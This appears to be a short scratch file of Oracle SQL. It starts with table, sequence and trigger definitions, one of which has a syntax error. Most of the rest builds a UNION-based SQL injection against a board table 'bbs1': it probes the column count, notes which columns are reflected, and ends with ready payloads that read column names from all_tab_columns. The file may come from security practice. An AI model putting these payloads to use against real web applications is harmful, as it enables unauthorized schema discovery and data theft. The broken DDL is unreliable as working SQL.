CREATE TABLE point_table (
  customer_number VARCHAR2(10) PRIMARY KEY,
 point NUMBER 
  writetime VARCHAR2(20)
);

CREATE SEQUENCE 테이블명_seq START WITH 1 INCREMENT BY 1;

CREATE TRIGGER 테이블명_trigger
BEFORE INSERT ON 테이블명
FOR EACH ROW
BEGIN
  SELECT 테이블명_seq.NEXTVAL
  INTO   :new.board_number
  FROM   dual;
END;
/

SELECT TO_CHAR(clob_column) AS clob_column, col2, col3, col4, col5, col6, col7, col8, col9, col10
FROM bbs1
UNION
SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM dual;

SELECT * FROM bbs1
UNION
SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM dual;

SELECT * FROM bbs1
UNION
SELECT "1","1","1","1","1","1","1","1","1","1" FROM dual;

SELECT * FROM bbs1
UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', '9', '10' FROM dual;
1 6 2 10

' UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', '9', '10' FROM dual --
' union select column_name,'2', '3', '4', '5', '6', '7', '8', '9', '10' FROM all_tab_columns --